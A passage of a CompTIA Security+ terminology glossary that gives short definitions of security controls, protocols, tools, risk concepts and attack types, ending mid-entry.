CompTIA Security+ Terminology review
Physical controls
(Security) controls that impact the physical world. Examples of this include fences, perimeter lighting, locks, fire suppression systems, and burglar alarms.
Hoax
(n.) an act intended to trick or deceive, a fraud; (v.) to trick, deceive
How to enforce security of machine learning algorithms
- Understand the quality and security of source data - Work with AI and ML developers to ensure that they are working in secure environments and that data sources, systems, and tools are maintained in a secure manner - Ensure that changes to AI and ML algorithms are reviewed, tested, and documented. - Encourage reviews to prevent intentional or unintentional bias in algorithms - Engage domain experts wherever possible
For datacenters and other facilities, a good rule of thumb is to place datacenters at least how far apart?
90 miles
Staging Environment
A "production like" environment to test installation, configuration and migration scripts; performance testing, load testing, processes required by other teams, boundary partners, etc.
Initialization Vector (IV)
A 24-bit value used in WEP that changes each time a packet is encrypted.
Online CA
A CA that is directly connected to a network; most common; these are the subordinate intermediate CAs that the alternative CA uses the root certificate to create.
Offline CA
A CA that is not directly connected to a network; often used for root certificates, the top-level certificate for their entire PKI.
BPDU Guard
A Cisco switch feature that listens for incoming STP BPDU messages, disabling the interface if any are received. The goal is to prevent loops when a switch connects to a port expected to only have a host connected to it.
Netflow
A Cisco-developed means of reporting network flow information to a structured database; allows better understanding of IP traffic flows as used by different network applications and hosts.
DNS sinkhole
A DNS server that gives out a false result for a domain name.
journalctl
A Linux command line utility used for querying and displaying logs from journald, the systemd logging service on Linux.
head (command)
A Linux command that displays the first set of lines of a text file; by default, this command displays the first 10 lines.
chmod (command)
A Linux command used to change a mode or permissions for files.
cat (command)
A Linux command used to display (or concatenate) the entire contents of a text file to the screen.
tail (command)
A Linux command used to display lines of text at the end of a file; by default, this command displays the last 10 lines of the file.
NAC (Agent)
A NAC solution that installs and deploys onto a network so that it can produce secure network environments
NAC (agentless)
A NAC solution that subsides on the memory of a network and isn't installed on the systems, instead a machine requesting to join the network gets deployed with this solution to ensure the environment is secure
Certificate revocation list (CRL)
A PKI component which lists digital certificates that have been revoked
Common Vulnerability Scoring System (CVSS)
A SCAP specification for communicating the characteristics of vulnerabilities and measuring their relative severity.
SIEM Correlation
A SIEM feature that searches the data acquired through SIEM aggregation to look for common characteristics, such as multiple attacks coming from a specific source; In a SIEM, the process of establishing a relationship between two variables, this is extremely useful because it can identify a large amount of malicious activity on networks much easier.
SIEM Rules
A SIEM quality that is essentially the heart of alarms, alerts, and correlation engines in a SIEM; preconfigured conditions that can use logic to determine if and when this quality will be activated, and then actions can trigger based on this.
Type 2 SOC report
A SOC report that provides the auditor's opinion on the operating effectiveness of controls; that is, the auditor actually confirms that the controls are functioning properly; this report goes further than its counterpart.
netstat
A TCP/IP command-line utility that shows the status of each active connection.
Measured boot
A UEFI firmware feature that logs the startup process. Antimalware software can analyze this to log to determine if malware is on the computer or or if the boot components were tampered with.
Always-on VPN
A VPN that allows the user to always stay connected instead of connecting and disconnecting from it.
Captive portals
A Web page that the user of a public-access network is obliged to view and interact with before access is granted.
Last Known Good Configuration
A Windows feature that starts the computer by using the registry information that was saved during the last shutdown; built in for the patching process, allowing a return to a checkpoint before a patch was installed.
P7B
A Windows-exclusive certificate that is stored in ASCII text format. The name of it is the same as the file extension.
Personal Information Exchange
A binary format of digital certificates commonly used by Windows systems. Stored in files with the .PFX or .P12 file extensions.
Fingerprint scanner
A biometric technology that can detect the unique patterns and swirls of an individual's finger.
Live boot media
A bootable operating system that can run from removable "lightweight" media like a thumb drive or DVD; allows you to boot a full OS that can see the hardware that a system runs on and that can typically mount and access drives and other devices (meaning repair efforts can be run from a known good, trusted operating system).
Command and control
A botnet sytem that operates in a client-server mode; they contact central control systems, which provide commands and updates, and track how many systems are in the botnet.
Switching Loop prevention
A broad term for a method of preventing switching loop or bridge loop problems. Both STP and RSTP prevent this.
Internet of Things
A broad term that describes network-connected devices that are used for automation, sensors, security, and similar tasks; bring a large number of security and privacy concerns
Route security
A broad term that describes the basis of communicating between networks and the need to understand that protocols connect these various networks for important functionality.
USB OTG
A cable used to connect mobile devices to other devices. It is one of many methods that you can use to connect a mobile device to external media.
Trusted Platform Module
A chip designed to secure hardware by storing encryption keys, digital certificates, passwords, and data specific to the host system for hardware authentication
Transposition cipher
A cipher that rearranges the order of characters in a message; involves transposing or scrambling the letters in a certain manner
Right-to-audit clause
A clause where the auditor can audit without notice; alerts vendors that the company reserves the right to audit the vendor's books at any time.
Serverless Architecture
A cloud computing execution model in which the cloud provider allocates machine resources on demand, taking care of the servers on behalf of their customers.
IaaS
A cloud computing model that allows an organization to rent access to hardware in a self-managed platform.
XaaS (Anything as a Service)
A cloud computing model that can work with a combination of other models: SaaS, IaaS, PaaS
PaaS
A cloud computing model that provides cloud customers with an easy-to-configure operating system and on-demand computing capabilities.
SaaS
A cloud computing model where the vendor hosts the software online and users access and use the software over the internet.
ISO 27001
A code of practice for implementing an information security management system, against which organizations can be certified.
ISO 27002
A code of practice for information security with hundreds of potential controls and control mechanisms. The standard is intended to provide a guide for the development of "organizational security standards and effective security management practices and to help build confidence in inter-organizational activities".
ISO 27701
A code of practice that is an extension to ISO 27001 and is a framework for managing privacy controls to reduce the risk of privacy breach to the privacy of individuals.
ISO 31000
A code of practice that provides guidelines for risk management programs. This document is not specific to cybersecurity or privacy but covers risk management in a general way so that it may be applied to any risk.
Baseline configuration
A collection of security and configuration settings that are to be applied to a particular system or network in the organization.
Security orchestration, automation, and response (SOAR)
A collection of software solutions and tools that allow organizations to streamline security operations in three key areas: threat and vulnerability management, incident response, and security operations automation.
Memdump
A command line utility used to dump system memory to the standard output stream by skipping over holes in memory maps.
traceroute/tracert
A command on many computer operating systems that discovers the IP addresses, and possibly host names, of the routers used by the network when sending a packet from one computer to another.
PowerShell
A command-line interactive scripting environment that provides the commands needed for most management tasks in a Windows Server 2012/R2 environment.
netcat
A command-line tool used to connect to remote systems.
nmap
A command-line tool used to scan networks. It is a type of network scanner.
dd (utility)
A command-line utility for Unix, Unix-like operating systems and beyond, the primary purpose of which is to convert and copy files.
theHarvester
A command-line utility for gathering results from open source intelligence queries.
route (command)
A command-line utility that allows you to display and make changes to the local IP routing table of the computer.
curl (command)
A command-line utility that can be used to obtain a Web page from a Web server.
ipconfig/ifconfig
A command-line utility that displays all the network configurations of the currently connected network devices and can modify the DHCP and DNS settings.
dnsenum
A command-line utility that is used for DNS enumeration to locate all DNS servers and DNS entries for a given organization.
Tcpreplay
A command-line utility that replays packets saved to a file back through a network adapter.
ping/pathping
A command-line utility used to determine if a host is reachable on an Internet Protocol network.
nslookup/dig
A command-line utility used to determine the IP address associated with a domain name, obtain the mail server settings for a domain, and other DNS information
Tcpdump
A common packet analyzer that runs under the command line. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
RAID
A common solution that uses multiple disks with data either striped or mirrored to ensure that data is not corrupted or lost; ensures that one or more disk failures can be handled by an array without losing data
Point-to-multipoint
A communications arrangement in which one transmitter issues signals to multiple receivers. The receivers may be undefined, as in a broadcast transmission, or defined, as in a non-broadcast transmission.
Images
A complete copy of a system or server, typically down to the bit level for the drive.
SIEM Sensors (component of dashboard)
A component that is often deployed to gather additional data; typically software agents, although they can be a VM or even a dedicated device; gather useful data for the SIEM and may either forward it in its original form or do some preprocessing to optimize the data before the SIEM ingests it.
Unified threat management
A comprehensive security management tool that combines multiple security tools, including firewalls, virtual private networks, intrusion detection systems, and web content filtering and anti-spam software
Kerberos
A computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner
Master Service Agreement (MSA)
A contract where parties agree to the terms that will govern future actions. This makes future services and contracts easier to handle and define; provides an umbrella contract for the work that a vendor does with an organization over an extended period of time.
Test environment
A controlled environment established to test products, services, and other configuration items.
Legal hold
A court order to maintain data for evidence; a notice that informs an organization that they must preserve data and records that might be destroyed or modified in the course of their normal operations.
Communication plan
A critical IR plan that outlines roles, such as who should communicate with the press or media, who will handle specific stakeholders, and who makes the final call on the tone or content of the communications.
SSH
A cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution.
Secure Shell (SSH) Protocol
A cryptographic network protocol for operating network services securely over an unsecured network. The best known example application is for remote login to computer systems by users.
FTK imager
A data preview and imaging tool that lets you quickly assess electronic evidence to determine if further analysis with a forensic tool is needed.
Point-to-point
A data transmission that involves one transmitter and one receiver; single sender and single receiver.
Hardware Security Module
A dedicated cryptographic processor that provides protection for cryptographic keys.
Air gap
A design that physically separates network segments, thus preventing network connectivity; require data to be physically transported
Virtual desktop infrastructure (VDI)
A desktop operating system running within a virtual machine (VM) running on a server.
Disaster recovery plan
A detailed process for recovering information or an IT system in the event of a catastrophic disaster such as a fire or flood; focuses on natural and man-made disasters that may destroy facilities, infrastructure, or otherwise prevent an organization from functioning normally.
Signage
A deterrent control that acts to prevent those who might casually violate the rules shown, not those actively seeking to bypass the security controls an organization has in place
Continuous integration
A development practice that requires developers to integrate code into a shared repository several times a day. Each check-in is then verified by an automated build, allowing teams to detect problems early.
Corporate owned, personally enabled (COPE)
A device agreement that an organization creates that is similar to the traditional corporate-owned model, but the primary difference is that the employees are free to use the device as if it was their personally owned device.
Proximity reader
A device that uses RFID to query a badge without requiring it to be inserted or swiped through a magnetic stripe reader
Proxy servers
A device/computer that all other computers must go through before accessing the Internet; a server (computer or application) that acts as an intermediary for requests from clients seeking resources from other servers.
Token key
A dynamic changing key that is able to identify a user digitally; a something you have factor.
Continuity of Operations Planning
A federally sponsored program in the US that is part of the national continuity program. It defines the requirements that government agencies need to meet to ensure that continuity of operation scan be ensured; also defines how federal agencies build a complete DR and BC plan.
SSH File Transfer Protocol
A file transfer protocol that allows the encryption of transmissions using the Secure Shell (SSH) protocol; FTP that runs on an SSL/TLS-secured connection.
Content/URL filter
A filter used to limit specific types of content across the web to users.
Stateless firewall
A firewall that manages each incoming packet as a stand-alone entity without regard to currently active connections. These firewalls are faster their counterpart, but are not as sophisticated.
Pointer/object dereference
A flaw that results in a pointer given a NULL instead of valid value.
Quantum computing
A form of computing that uses the principles of quantum physics to represent data and perform operations on these data.
MAC filtering
A form of network access control to allow or block access based on the MAC address. It is configured on switches for port security or on APs for wireless security.
Impact assessment
A form of policy analysis that examines the likely effects or impacts of proposed or adopted policies. These may be environmental, social, economic, or other significant impacts.
Session Initiation Protocol (SIP) traffic
A form of protocol-based traffic that can include internet telephony, video conferencing and other forms of unified communications.
ZigBee
A form of wireless communications frequently used in security systems and heating and cooling control systems; designed for PANs like those founds in houses for home automation
Terms of agreement
A formal list of rules you agree to follow; also lists consequences you agree to accept for not following the rules.
Business Impact Analysis (BIA)
A formal process designed to identify the mission essential functions within an organization and facilitate the identification of the critical systems that support those functions.
Risk control assessment
A formalized approach to risk prioritization that allows organizations to conduct their reviews in a structured manner.
NIST CSF
A framework designed to assist organizations attempting to meet one or more of the following five objectives: - Describe their current cybersecurity posture - Describe their target state for cybersecurity - Identify and prioritize opportunities for improvement within the context of a continuous and repeatable process - Assess progress toward the target state - Communicate among internal and external stakeholders about cybersecurity risk.
The Diamond Model of Intrusion Analysis
A framework for analyzing cybersecurity incidents and intrusions by exploring the relationships between four core features: adversary, capability, infrastructure, and victim; describes a sequence where an adversary deploys a capability targeted at an infrastructure against a victim.
Data governance policy
A generic policy that defines who is responsible for the data, how it can be accessed, how it should be used, and how its integrity can be maintained; clearly states the ownership of information created or used by the organization.
Data classification policy
A generic policy that describes the classification structure used by the organization and the process used to properly assign classifications to data; policy that should describe the classifications, levels of control at each classification and responsibilities of all potential users including ownership
Data retention policy
A generic policy that outlines what information the organization will maintain and the length of time different categories of work product will be retained prior to destruction; a security policy that stipulates how long data is retained by the organization, based on the data type.
IP theft risks
A generic term for risks that occur when a company possesses trade secrets or other proprietary information which, if disclosed, could compromise the organization's business advantage.
Software compliance/licensing risks
A generic term for risks that occur when an organization licenses software from a vendor and intentionally or accidentally runs afoul of usage limitations that expose the customer to financial and legal risk.
Magnitude
A generic term that refers to the impact that a given risk will have on an organization if it does occur; may be expressed a financial cost, although there are other possible measures.
Likelihood of occurrence
A generic term that refers to the probability that a risk will occur.
Risk matrix/heat map
A graphical table indicating the likelihood and impact of risk factors identified for a workflow, project, or department for reference by stakeholder; quickly summarizes risks and allows senior leaders to quickly focus on the most significant risks facing the organization.
Stored procedures
A group of SQL statements that execute as a whole, similar to a mini-program. Developers use stored procedures to prevent SQL injection attacks.
Honeynet
A group of honeypots in a network. Honeynets are often configured in virtual networks.
Red Team
A group of people authorized and organized to emulate a potential adversary's attack or exploitation capabilities against an enterprise's security posture. The group's objective is to improve enterprise Information assurance by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders in an operational environment.
Semi-authorized hackers
A hacker who finds a vulnerability, but doesn't take advantage of it (Gray Hat)
Jump servers
A hardened system on a network specifically used to access devices in a separate security zone.
Password keys
A hardware-based authentication device that stores passwords and helps prevent unauthorized logins and account takeovers.
NAT gateway
A highly available, managed Network Address Translation (NAT) service for your resources in a private subnet to access the Internet.
Pre-shared key
A key value that must be created and entered into the access point and all devices prior to the devices communicating with the access point.
MITRE ATT&CK
A knowledge base and framework of different attack techniques to understand and defend against an attacker; includes detailed descriptions, definitions, and examples for the complete threat lifecycle from initial access through execution, persistence, privilege escalation, and exfiltration.
Data breach notification laws
A law that varies by country/location and specifies the maximum time that can elapse before customers are notified of a data breach.
Cold aisle
A layout created by having the front of the equipment face toward the center of the aisle. Typically, these face air conditioner output ducts.
Hot aisle
A layout that has the back of the equipment face the aisle. Typically these face air conditioner return ducts.
Non-Disclosure Agreement (NDA)
A legal contract between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share with one another for certain purposes but wish to restrict access to or by third parties
Access control list
A list attached or linked to a specific resource that describes users or user groups and the nature of permitted access
Penetration testing
A live test of the effectiveness of security defenses through mimicking the actions of real-life attackers
Raspberry Pi
A low budget, single-board, pocket sized computer which is easy to program; can run a variety of different OSs; more likely to be found used for personal development or small-scale custom use
NIST RMF
A mandatory standard for federal agencies that provides a formalized process that federal agencies must follow to select, implement, and assess risk-based security and privacy controls; a risk-based approach to selection of security controls and considers effectiveness, efficiency, and constraints due to applicable laws, directives, executive orders, policies, standards, or regulations.
Online backup
A means of backing up or storing data using the Internet; data is always available
Mandatory Access Control (MAC)
A means of restricting access to data based on varying degrees of security requirements for information contained in the objects and the corresponding security clearance of users or programs acting on their behalf; typically found in military settings
Mean Time Between Failures (MTBF)
A measure of the reliability of a system; the expected amount of time that will elapse between system failures.
Faraday cage
A metallic enclosure that blocks an electromagnetic field.
Filesystem permissions
A method for protecting files managed by the OS
Substitution cipher
A method of encryption and decryption in which each letter in the alphabet is replaced by another; a type of coding or ciphering system that changes one character or symbol into another; involves simply shifting all letters a certain number of spaces in the alphabet.
Computer-based training
A method of training that utilizes computer technology to enhance the acquisition of knowledge and skills
Protected Extensible Authentication Protocol (PEAP)
A method to securely transmit authentication information over wired or wireless networks. It uses server-side public key certificates to authenticate the server.
Port spanning/port mirroring
A method used on a network switch to send a copy of network packets seen on one switch port to a network monitoring connection on another switch port.
Continuous delivery
A methodology that focuses on making sure software is always in a releasable state throughout its lifecycle.
Arduino
A microcontroller (not single-board) that includes a lower-power CPU with a small amount of memory and storage; provide I/O capabilities; often used for prototyping devices that interface with sensors, motors, lighting, etc; has a reduced attack surface because it does not have a wired/wireless network connection built into it
Choose Your Own Device (CYOD)
A mobile device deployment methodology where each person chooses their own device type.
Purple Team
A mode of penetration testing where red and blue teams share information and collaborate throughout the engagement.
Network segmentation
A network arrangement in which some portions of the network have been separated from the rest of the network in order to protect some resources while granting access to other resources.
Intranet
A network designed for the exclusive use of computer users within an organization that cannot be accessed by users outside the organization
Wi-Fi Protected Access 2
A network security technology commonly used on Wi-Fi wireless networks. It's an upgrade from the original WPA technology, which was designed as a replacement for the older and less secure WEP; The final version of WPA agreed on by the Wi-Fi Alliance; it implements all aspects of the ratified 802.11i security standard and is mandatory in the Wi-Fi certification process.
VLAN
A network that can logically group several different computers together, or logically separate computers, without regard to their physical location. It is possible to create multiples of this with a single switch.
Nessus
A network-vulnerability scanner available from Tenable Network Security.
White Team
A neutral team of employees acting as observers, referees, and judges between the other teams in a penetration test or incident response drill.
System on a Chip
A new type of processor that integrates the functions of a processor, memory, and video card on a single chip
Center for Internet Security (CIS)
A non-profit organization that publishes information on cybersecurity best practices and threats. They also provide tools to help harden your environment and provide risk management; an industry organization that publishes hundreds of benchmarks for commonly used platforms.
Open Web Application Security Project
A nonprofit organization focused on improving the security of application software.
Time-based one-time password
A one-time password or code that expires after 30 seconds (or another short period of time)
HMAC-based One-Time Password
A one-time password that changes when a specific event occurs.
Password vaults
A password manager that creates a database for all credentials/passwords, everything is encrypted with personal and enterprise options
Active Reconnaissance
A penetration testing method used to collect information. It sends data to systems and analyzes responses to gain information on the target.
Passive Reconnaissance
A penetration testing method used to gather and collect information. It typically uses open-source intelligence.
Metasploit
A penetration-testing tool that combines known scanning techniques and exploits to explore potentially new types of exploits; includes rootkits that leverage languages such as Perl, Bash, and Python.
Access control vestibules
A physical control (also called a mantrap) that when a person opens one door, another door locks until the initial door is closed and locked too.
Hardware firewall
A physical filtering component that inspects data packets from the network before they reach computers and other devices on a network; a free-standing unit that does not use the resources of the computers it is protecting, so there is no impact on processing performance
Host-based firewall
A piece of software running on a single host that can restrict incoming and outgoing network activity for that host only.
Ping of Death
A ping that exceeds the maximum packet size and causes the receiving system to fail.
Business continuity plan
A plan for how an organization will recover and restore partially or completely interrupted critical function(s) within a predetermined time after a disaster or extended disruption; focuses on keeping an organization functional when misfortune or incidents occur; in the context of IR processes, these plans may be used to ensure that systems or services that are impacted by an incident can continue to function despite any changes required by the IR process.
Incident response plans
A plan that describes the steps an organization performs in response to any situation determined to be abnormal in the operation of a computer system or network.
Clean desk space
A policy designed to ensure that all confidential or sensitive materials, either in paper form or electronic, are removed from a user's workspace and secured.
Acceptable use policy
A policy that a user must agree to follow in order to be provided access to a network or to the internet; a policy that provides network and system users with clear direction on permissible uses of information resources.
Subscriber Identity Module
A portable memory chip that holds the personal information of the item's account holder
Data masking
A privacy-enhancing technology that partially redacts sensitive information by replacing some or all of sensitive fields with blank characters. An example is replacing all but the last four digits of a credit card number with X's to render the card number unreadable.
Virtual Private Network
A private data network that creates secure connections, or "tunnels," over regular Internet lines
Key escrow
A process in which keys are managed by a third party, such as a trusted CA.
GPS tagging
A process of adding geographical data to files such as pictures. It typically includes latitude and longitude coordinates of the location where the picture was taken or the file was created.
Containment
A process that leaves a system in place but works to prevent further malicious actions or attacks; frequently accomplished using firewall rules or similar capabilities to limit the traffic that the system can send or receive.
Version control
A process to keep track of what changes were made to what files so that a specific version can be referred to and improvements in multiple versions can be merged together.
Pulverizing
A process used to physically destroy items such as optical discs that aren't erased by a degausser; breaks devices down into very small pieces to prevent recovery
Bug bounty
A program run by a company that pays a significant reward to anyone who finds and reports problems (bugs) in their system.
Software firewall
A program that runs on a computer to allow or deny traffic between the computer and other computers to which it is connected
Compiler
A program that translates instructions or code into a language that can be read and understood by a computer.
Input validation
A programming process that verifies data is valid before using it.
SEAndroid
A project based on NSA's SELinux that develops onto Android devices to address a broad scope of system security issues, helps prevent malicious activity and has centralized policy configuration for all deployments.
Secure Real-time Transport Protocol (SRTP)
A protocol for providing protection (encryption, integrity, and anti-replay) for Voice over IP (VoIP) communications.
Post Office Protocol
A protocol that allows a computer to retrieve email from a server.
Dynamic Host Configuration Protocol
A protocol that allows dynamic IP address allocation so users do not have to have a preconfigured IP address to use the network
Layer 2 Tunneling Protocol
A protocol that combines PPTP and L2F; a tunneling protocol used to support virtual private networks or as part of the delivery of services by ISPs.
Domain Name System
A protocol that converts IP addresses into domains
Trusted Automated eXchange of Intelligence Information (TAXII)
A protocol that is intended to allow cyber threat information to be communicated at the application layer via HTTPS; specifically designed to support STIX data exchange
Online Certificate Status Protocol (OCSP)
A protocol that performs a real-time lookup of a certificate's status; an Internet protocol that obtains the revocation status of an X.509 digital certificate.
SSL
A protocol that provides security when communicating on the Internet
Internet Message Access Protocol
A protocol that resides on an incoming mail server. Similar to POP, but is more powerful. Allows sharing of mailboxes and multiple mail server access. The current version is ____v4.
Short message service
A protocol used by cellular providers to enable text messages to be sent from one mobile device to another.
IPSec
A protocol used to encrypt traffic on the wire and can operate in both tunnel mode and transport mode.
TLS
A protocol used to encrypt traffic on the wire; the replacement for SSL and like SSL, it uses certificates issued by CAs.
Blockchain
A public digital ledger in which transactions made in bitcoin or another cryptocurrency are recorded chronologically and publicly; can store records in a way that distributes those records among many different systems located around the world and do so in a manner that prevents anyone from tampering with those records.
Time Of Check/Time Of Use
A race condition that occurs when a program checks access permissions too far in advance of a resource request
Threat maps
A real-time map of the computer security attacks that are going on at any given time.
TACACS+ (Terminal Access Control Access Control System+)
A remote authentication protocol which allows a remote access server to communicate with an authentication server to validate user access onto the network.
Warm site
A remote site that contains computer equipment but does not have active Internet or telecommunication facilities, and does not have backups of data.
Manual Code Review
A review that can be done in two ways: undirected and directed - undirected is essentially proofreading of code to oneself and directed is explaining the code to a team/group of people.
Qualitative Risk Assessment
A risk assessment that substitutes subjective judgments and categories for strict numerical analysis, allowing the assessment of risks that are difficult to quantify; a risk assessment that uses judgment to categorize risks. it is based on impact and likelihood of occurrence.
Quantitative Risk Assessment
A risk assessment that uses numeric data in the analysis, resulting in assessments that allow the very straightforward prioritization of risks; a risk assessment that uses specific monetary amounts to identify cost and asset value.
Risk mitigation
A risk management strategy of applying security controls to reduce the probability and/or magnitude of a risk; the most common risk management strategy.
Risk acceptance
A risk management strategy that boils down to deliberately choosing to take no other risk management strategy and to simply continue operations as normal in the face of the risk; may be warranted if the cost of mitigating a risk is greater than the impact of the risk itself.
Risk transference
A risk management strategy that shifts some of the impact of a risk from the organization experiencing the risk to another entity; the most common example is purchasing an insurance policy that covers a risk.
Risk avoidance
A risk management strategy where we change our business practices to completely eliminate the potential that a risk will materialize.
Risk and control self-assessment (RCSA)
A risk profile analysis process that identifies the risks, classifies each risk into clearly defined categories, and quantifies the risks with respect to the probability of occurrence and the impact on value and/or cash flows; a tool that allows an organization to understand its risks and their potential impact on the business. It is a formal exercise many organizations conduct annually.
Evil twin attack
A rogue wireless access posing as a legitimate wireless service provider to intercept information that users transmit
Iris scan
A scan of the colored portion of the eye, including all rifts, coronas, and furrows.
Non-Intrusive Scan
A scan that uses only available information to hypothesize the status of the vulnerability.
Protected cable distribution
A scheme that locks away or secures all the networking cables and prevents any type of emissions; also keep attackers from physically removing cables or plugging in additional cables; are most commonly used by utility companies.
Two-person integrity control
A scheme where two trusted staff members must work together to provide access - with dual keys, with passwords, or with two portions of an access control factor
File Transfer Protocol Secure
A secure version of the File Transfer Protocol optimized for file transfers. It uses SSL or TLS for security and uses port 990 or 21.
Lightweight Directory Access Protocol over SSL
A secure, open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network.
Deny List
A security configuration where access is allowed to any entity (software process, IP/domain, and so on) unless the entity appears on the (deny) list.
Allow list
A security configuration where access is denied to any entity (software process, IP/domain, and so on) unless the entity appears on the (allow) list.
Virtual machine escape protection
A security protection that prevents a virtual machine from directly interacting with the host operating system.
Mobile application management (MAM)
A security strategy that administers and enforces corporate e-policies for applications on mobile devices.
Moisture detection
A sensor that can detect water leaks, dampness, or increased moisture levels.
Hot site
A separate and fully equipped facility where the company can move immediately after a disaster and resume business
Cold site
A separate facility that does not have any computer equipment, but is a place where employees can move after a disaster; provides only rudimentary services and facilities; have space, power, and often network connectivity, but they are not prepared with systems or data
Honeypot
A server designed to attract an attacker. It typically has weakened security encouraging attackers to investigate it.
Network attached storage
A server that is placed on a network with the sole purpose of providing storage to users, computers, and devices attached to the network
Multimedia Messaging Service (MMS)
A service offered by wireless companies that allows cell phone users to attach and send a variety of media to other users.
RAID levels
A set of RAID configurations that consists of striping, mirroring, or parity.
Hardware root of trust
A set of functions in the trusted computing module that is always trusted by the computer's operating system (OS).
Rootkit
A set of programs that enables its user to gain administrator level access to a computer without the end user's consent or knowledge.
Domain Name System Security Extensions
A set of specifications that provide authentication and other security mechanisms to DNS data.
Near Field Communication (NFC)
A set of standards primarily for smartphones and smart cards that can be used to establish communication between devices in close proximity.
MicroSD HSM
A small form-factor hardware encryption and security module that can be added to any mobile device with a MicroSD card slot.
Endpoint detection and response
A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats
Microservices/API
A software architecture that is composed of smaller modules that interact through APIs and can be updated without affecting the entire system.
Continuous deployment
A software development approach where an organization's developers release products, features, and updates in shorter cycles, when ready, rather than wait for centrally-managed delivery schedules.
OpenSSL
A software library for applications that secure communications over computer networks against eavesdropping or need to identify the party at the other end; a widely used open-source implementation of the SSL/TLS protocol that was affected by the Heartbleed bug.
Data exposure
A software vulnerability where an attacker is able to circumvent access controls and retrieve confidential or sensitive data from the file system or database.
Quarantine
A solution which can place files in a specific safe zone until it can be determined whether they're safe to release or not.
Advanced Persistent Threat (APT)
A sophisticated, possibly long-running computer hack that is perpetrated by large, well-funded organizations such as governments
Web application firewall
A special type of application-aware firewall that looks at the applications using HTTP; A special type of firewall that looks more deeply into packets that carry HTTP traffic.
Functional recovery plans
A specific DRP for critical business functions.
Wi-Fi Protected Setup
A standard included on many WAPs and clients to make secure connections easier to configure
Wi-Fi direct/ad hoc
A standard that allows devices to connect without a wireless access point.
Wi-Fi Protected Access 3
A standard that offers improved data encryption over WPA2 and allows for Individual Data Encryption, whereby a laptop or other wireless device can create a secure connection over a public, unsecured Wi-Fi network.
Payment Card Industry Data Security Standard (PCI DSS)
A standard that provides detailed rules about the storage, processing, and transmission of credit and debit card information; not a law, but rather a contractual obligation that applies to credit card merchants and service providers worldwide.
File/code repositories
A storage area in which victims of an attack can upload malicious files and software code that can then be examined by others to learn more about these attacks and craft their defenses.
Simultaneous Authentication of Equals (SAE)
A strong authentication method used in WPA3 to authenticate wireless clients and APs and to prevent dictionary attacks for discovering pre-shared keys.
Certificate Signing Request (CSR)
A structured message sent to a certificate authority requesting a digital certificate.
Registration Authority (RA)
A subordinate entity designed to handle specific CA tasks such as processing certificate requests and authenticating users; performs certificate registration services on behalf of a CA.
Out-of-band management
A switch management option that provides on-site infrastructure access when the network is down or complete remote access in cases of connectivity failures on the network, such as via a cellular signal, in order to interface with a switch.
Switch Port Analyzer (SPAN)
A switch-specific tool that copies Ethernet frames passing through switch ports and send these frames out to specific port. The switch itself doesn't analyze these copied frames, it send frames out of the specific port to this.
Identity Provider (IdP)
A system entity that creates, maintains, and manages identity information for principals and also provides authentication services to relying applications within a federation or distributed network.
Network-Based Intrusion Detection System (NIDS)
A system for examining network traffic to identify suspicious, malicious, or undesirable behavior.
Rights management
A system of data protection at the file level that uses various forms of permissions, rules, and security policies.
File integrity monitors
A system that detects any changes within the files that may indicate a cyberattack.
Global Positioning System (GPS)
A system that determines the precise position of something on Earth through a series of satellites, tracking stations, and receivers.
Directory services
A system that enables network resources to be viewed as objects stored in a database. This database can then be divided and distributed among different servers on the network. An example of directory services includes LDAP or Microsoft Active Directory.
UPS
A system that provides battery or other backup power options for short periods of time
Cyber Kill chain
A systematic outline of the steps of a cyberattack, introduced at Lockheed Martin in 2011.
Rainbow table
A table of hash values and their corresponding plaintext values that can be used to look up password values if an attacker is able to steal a system's encrypted password file.
Prepending
A technical method used in social engineering to trick users into entering their username and passwords by adding an invisible string before the weblink they click
Network Address Translation (NAT)
A technique that allows private IP addresses to be used on the public Internet; translates the private IP address to a public address for routing over the Internet
Obfuscation/camouflage
A technique that essentially "hides" or "camouflages" code or other information so that it is harder to read by unauthorized users.
Secure Sockets Layer (SSL) stripping
A technique that involves removing the encryption between a client and a website.
Segmentation
A technique that is often employed before an incident occurs to place systems with different functions or data security levels in different zones or segments of a network.
Key stretching
A technique used to create encryption keys from passwords in a strong manner
Salting
A technique used to increase the strength of stored passwords. it adds additional bits (called salts) to each password prior to hashing and can help thwart brute force and rainbow table attacks.
Security Information and Event Management (SIEM)
A technology that allows for real-time analysis of security alerts generated by network hardware and applications.
Perfect forward secrecy
A technology where layers of encryption prevent nodes in the relay chain from reading anything other than the specific information they need to accept and forward the traffic; a property of public key cryptographic systems that ensures that any session key derived from a set of long-term keys cannot be compromised if one of the keys is compromised at a future date.
Data custodian
A term for individuals or teams who do not have controller or stewardship responsibility but are responsible for the secure safekeeping of information. For example, a data controller might delegate responsibility for securing PII to an information security team.
Data processor
A term for service providers that process personal information on behalf of a data controller. An example is a credit card processing service for a retailer.
Narrowband
A term that refers to communications channels that have low bandwidth (slower communication); generally have less noise and thus better range and sensitivity
data sovereignty
A term that refers to the legal implications of data stored in different countries. It is primarily a concern related to backups stored in alternate locations via the cloud.
Order of volatility
A term that refers to the order in which you should collect evidence; documents what data is most likely to be lost due to system operations or normal processes.
Insider Threat
A threat to an organization that comes from employees, contractors, and anyone else that may have willingly been given insider knowledge.
Time stamp
A time value that is associated with a data value, often indicating when some event occurred that affected the data value.
Phishing simulations
A training or simulation that helps employees recognize phishing emails.
Certificate Authority (CA)
A trusted third-party organization or company that issues digital certificates
SYN flood
A type of DoS where an attacker sends a large amount of SYN request packets to a server in an attempt to deny service.
Machine learning
A type of artificial intelligence that leverages massive amounts of data so that computers can improve the accuracy of actions and predictions on their own without additional programming.
Snapshot
A type of backup that captures the full state of a system or device at the time the backup is completed; common for VMs
Extended validation certificates
A type of certificate issued by a CA; they provide a higher level of assurance and the CA takes steps to verify that the certificate owner is a legitimate business before issuing the certificate.
Field Programmable Gate Array
A type of computer chip that can be programmed to redesign how it works, allowing it to be a customizable chip; is not an embedded system alone - needs to be integrated as one component of an embedded system or as the program processor inside of one.
USB
A type of connection used to attach devices such as flash drives, scanners, cameras, and printers to a computer.
Stateful firewall
